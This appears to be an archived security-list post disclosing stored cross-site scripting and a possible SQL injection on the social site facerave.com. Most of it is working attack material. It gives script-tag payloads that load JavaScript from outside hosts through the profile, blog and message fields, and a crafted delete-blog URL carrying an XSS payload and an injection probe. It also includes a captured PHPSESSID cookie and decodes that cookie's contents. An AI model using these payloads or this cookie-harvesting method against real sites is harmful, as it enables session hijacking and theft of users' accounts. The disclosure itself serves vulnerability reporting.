<<< Date Index >>>     <<< Thread Index >>>

Facerave.com - XSS & sessions disclosure



Facerave.com

Homepage:
http://www.facerave.com

Effected files:

* Profile input boxes

- Self Description box

* Posting a blog entry

* Sending a message

index.php
------------------------------------------------------

XSS vuln with cookie disclosure via posting a comment:

No filter evasion needed. for PoC in yourself description box put:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/facerave1.jpg
http://www.youfucktard.com/xsp/facerave2.jpg

-----------------------------------------------------

XSS vuln with cookie disclosure when posting a blog entry:

Same as above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/facerave3.jpg
http://www.youfucktard.com/xsp/facerave4.jpg

Our cookie:

This is remote text via xss.js located at youfucktard.com lang=en; 
PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9;
 last_pr=7454


Breaking down the cookie:

PHPSESSID= (Our php session Id on the site)

voted= Base64 encoded. When we decode it we get:

a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6


----------------------------------------------------

XSS Vuln and possible SQL injection on deleting blog id:

http://www.facerave.com/index.php?req=blog&act=del&id=1087";>"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>

Query error msg:
You have an error in your SQL syntax near '\' AND b_user=7454' at line 1
Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454

Screenshot:
http://www.youfucktard.com/xsp/facerave5.jpg

-----------------------------------------------------

Sending a message xss vuln:

Same as above, no filter evasion. in your msg title or subject put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshot:
http://www.youfucktard.com/xsp/facerave6.jpg
------------------------------------------------------